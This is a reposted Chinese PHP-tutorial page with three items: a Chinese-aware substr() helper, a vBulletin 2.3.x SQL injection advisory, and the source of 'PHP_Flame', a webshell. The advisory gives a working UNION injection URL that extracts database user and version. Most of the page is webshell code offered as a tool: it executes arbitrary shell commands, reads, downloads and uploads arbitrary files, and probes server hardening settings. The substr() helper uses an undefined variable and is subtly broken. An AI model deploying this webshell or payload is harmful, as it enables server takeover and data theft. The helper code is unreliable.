当前位置: 编程技术>php
本页文章导读:
▪substr()函数中文版
substr()函数中文版
普通的substr()函数可以取得字符串的指定长度子字符串,但遇到中文时可能会在新字符串末尾产生乱码,下面这个函数将超过$len长度的字符串转.........
▪vBulletin Forum 2.3.xx SQL Injection
vBulletin Forum 2.3.xx SQL Injection
There exist a sql injection problem in calendar.php.-------- Cut from line 585 in calendar.php ----------else if ($action == "edit"){ $eventinfo = $DB_site->query.........
▪PHP_Flame(Version:Progress)的原代码
I
PHP_Flame (Version: Progress ) 的一些信息: *修正了无法下载文件的BUG *修正了无法返回上级的BUG *修正了代码编辑出现错误的BUG ...... *增加PHPINFO的功能 *增加多文件.........
[1]substr()函数中文版
来源: 互联网 发布时间: 2013-11-30
substr()函数中文版 普通的substr()函数可以取得字符串的指定长度子字符串,但遇到中文时可能会在新字符串末尾产生乱码,下面这个函数将超过$len长度的字符串转换成以“...”结尾,并且去除了乱码。
用法:$new = getsubstring($old,20);
function getsubstring($str,$len)
{
for($i = 0;$i <$end;$i++)
{
if ($i >=0 AND $i <$end)
{
if(ord(substr($str,$i,1)) > 0xa1)
$result_str.=substr($str,$i,2);
else
$result_str.=substr($str,$i,1);
}
if(ord(substr($str,$i,1)) > 0xa1)
$i++;
}
if(strlen($str)<=$end)
return $result_str;
else
return $result_str."...";
}
[2]vBulletin Forum 2.3.xx SQL Injection
来源: 互联网 发布时间: 2013-11-30
vBulletin Forum 2.3.xx SQL Injection There exist a sql injection problem in calendar.php.
-------- Cut from line 585 in calendar.php ----------
else if ($action == "edit")
{
$eventinfo = $DB_site->query_first("SELECT allowsmilies,public,userid,
eventdate,event,subject FROM calendar_events WHERE eventid = $eventid");
-----------------------------------------------------
If the MySQL version is greater than 4.00, a UNION attack could be used.
-----------------------------------------
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_ev
ents%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
-----------------------------------------
The query_first function will only return the first row of the query result, so make sure it returns !
the one you want.
[3]PHP_Flame(Version:Progress)的原代码
来源: 互联网 发布时间: 2013-11-30
I PHP_Flame (Version: Progress ) 的一些信息:
*修正了无法下载文件的BUG
*修正了无法返回上级的BUG
*修正了代码编辑出现错误的BUG
......
*增加PHPINFO的功能
*增加多文件下载的功能
*增加执行系统命令的功能
*增加代码查看功能
*增加服务器安全探测功能
.......
*还有许多美化工作。。。。。。 相关的资料:
1。修正了无法返回上级的BUG的代码:
echo "<a href=/index.html"$php_self?act=dir&dir=$dir\..\">返回上级</a>";
2。修正了无法下载文件的相关代码:
case "download":
if (!@is_file($_GET['file_name']))
echo"你要下的文件不存在";
$filename = basename($_GET['file_name']);
$filename_info = explode('.', $filename);
$fileext = $filename_info[count($filename_info)-1];
header('Content-type: application/x-'.$fileext);
header('Content-Disposition: attachment; filename='.$filename);
header('Content-Description: PHP3 Generated Data');
readfile($_GET['file_name']);
break;
3。增加代码查看功能
<a href="/blog_article/</echo$php_self;/gt;actionaa/cmd/amp;method/show_source/amp;cmd/lt; echo $_GET[.html'file'];?>" target=_blank>文件代码</a>
4。修正了代码编辑出现错误的代码:
$tem= str_replace("/textarea>","//textarea>",$tem);
。。。。。
$tem= str_replace("//textarea>","/textarea>",$tem);
5。增加服务器安全探测功能:
if (get_cfg_var("safe_mode"))echo"on<br>";else echo"off<br>";
echo "* disable_functions:";$dis_func=get_cfg_var("disable_functions");
if ($dis_func=="")
{
echo("<font color=red><b>no value</b></font>");
}
else
{
$dis_func=str_replace(" ","<br>",$dis_func);
$dis_func=str_replace(",","<br>",$dis_func);
echo("$dis_func");
}
6。执行系统命令部分的代码:
<?
if ($actionaa=="cmd") { ?>
<body bgcolor="#6595d6">
<form name="form1" method="post" action="/blog_article/</ $PHP_SELF /gt;actionaa/cmd.html">
<select name="method">
<option value="system" <? if ($method=="system") { echo "selected"; } ?>>system</option>
<option value="passthru" <? if ($method=="passthru") { echo "selected"; } ?>>passthru</option>
<option value="show_source" <? if ($method=="show_source") { echo "selected"; } ?>>show_source</option>
<option value="opendir" <? if ($method=="opendir") { echo "selected"; } ?>>opendir</option>
<option value="popen" <? if ($method=="popen") { echo "selected"; } ?>>popen</option>
</select><br>
<input type="text" name="cmd" size="40" value="<?= $cmd; ?>">
<input type="submit" name="Submit" value="<?=$method?>">
<br>
</form>
<?
if (!$method) { $method="system"; }
if (!$cmd) {
echo "* JSW'S PHP FLAME<br>";
echo "* Author: JSW<br>";
echo "* safe_mode:";if (get_cfg_var("safe_mode"))echo"on<br>";else echo"off<br>";
echo "* disable_functions:";$dis_func=get_cfg_var("disable_functions");
if ($dis_func=="")
{
echo("<font color=red><b>no value</b></font>");
}
else
{
$dis_func=str_replace(" ","<br>",$dis_func);
$dis_func=str_replace(",","<br>",$dis_func);
echo("$dis_func");
}
echo "<br>* Now please choose a function and enter the command......";
}
echo "<br><pre>";
if ($method=="system") {
system("$cmd 2>&1");
}
if ($method=="passthru") {
passthru("$cmd 2>&1");
}
if ($method=="opendir") {
$h=opendir($cmd);
while($file=readdir($h)) {
echo "$file\n";
}
}
if ($method=="show_source") {
if (show_source($cmd)) {
//echo "<pre>";
//echo show_source($file);
//echo "</pre>";
} else {
echo "<script> alert(\"unable to read file: $file using: show_source\"); </script>";
}
}
if ($method=="popen") {
$pp = popen('$cmd 2>&1', 'r');
$read = fread($pp, 2096);
echo $read;
pclose($pp);
}
echo "</pre>";
exit;
}
?>
7。增加文件上载的代码:
<?php
if($dir=="")
$dir="./";
?>
<?
if($tools==upload)
{
for($i=1;$i<21;$i++)
{
$temp1="userfile".$i;
$temp2="userfile".$i."_name";
$source=$$temp1;
$source_name=$$temp2;
if(@$source!="")
{
@$v=file_exists($filedir);
if(!$v)
{
mkdir(@$filedir,0777);
}
@chmod($filedir,0777);
if(file_exists("$filedir/$source_name")=="1")
{
if($up_flag=="y")
{
@unlink($filedir/$source_name);
@copy($source,"$filedir/$source_name");
echo $source_name."已覆盖上传<br>";
}
else
echo $source_name."请重新上传!<br>";
}
else
{
@copy($source,"$filedir/$source_name");
echo $source_name."已上传<br>";
}
}
}//end for
echo"
<html>
<head>
<title>JSW'S PHP FLAME</title>
<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\">
<link href=/blog_article/t.css rel=stylesheet type=text/css>
<script language=\"javascript\">
function setid()
{
str='<br>';
if(!window.uploadForm.upcount.value
window.uploadForm.upcount.value>20
window.uploadForm.upcount.value==0)
window.uploadForm.upcount.value=1;
for(i=1;i<=window.uploadForm.upcount.value;i++)
str+='文件'+i+':<input type=\"file\" name=\"userfile'+i+'\" width:400\" tx1\"><br><br>';
window.upid.innerHTML=str+'<br>';
}
</script>
</head>
<body>
<body bgcolor=\"#6595d6\">
<table width=\"550\" border=\"1\" cellspacing=\"0\" cellpadding=\"5\" align=\"center\">
<form name=\"t\" method=\"get\" action=\"?\">
<tr t2\">
<td><li> 1.指定上传目录(默认为本程序所在目录)
<input type=\"hidden\" name=\"tools\" value=\"upload\">
<input type=\"text\" name=\"dir\">
<input type=\"submit\" value=\"确定\" name=\"t\"></td></li>
</tr>
</form>
<form name=\"uploadForm\" method=\"post\" action=\"?tools=upload&dir=$dir\" enctype=\"multipart/form-data\">
<tr t2\">
<td>
<li> 2.需要上传的个数(建议最大值 20)
<input type=\"text\" name=\"upcount\" tx\" value=\"1\">
<input type=\"button\" name=\"Button\" bt\" onclick=\"setid();\" value=\"设定\">
</li>
<li> 3.全部文件都覆盖上传: <input type=\"radio\" name=\"up_flag\" value=\"y\">是<input type=\"radio\" name=\"up_flag\" value=\"n\" checked>否
</li>
<br>
<br>
您的文件将被上传到: $dir
<input type=\"hidden\" name=\"filedir\" tx\" value=\"$dir\">
<a href=/index.html"?\">返回PHP_Flame</a>
</td>
</tr>
<tr>
<td id=\"upid\" height=\"122\"> 文件1:
<input type=\"file\" name=\"userfile1\" width:400\" tx1\" value=\"\">
</td>
</tr>
<tr>
<td>
<input type=\"submit\" name=\"upload\" value=\"上传\" bt\">
<input type=\"reset\" name=\"reset\" value=\"重执\" bt\">
</td>
</tr></form>
</table>
</body>
</html>";
exit;}
?>
。。。。。。
最后指明的是,这个PHP程序是在安然的PHP Command的基础上编写的,在此表示感谢,完整代码: http://jsw.china12e.com/jswsoft/show.php
最新技术文章: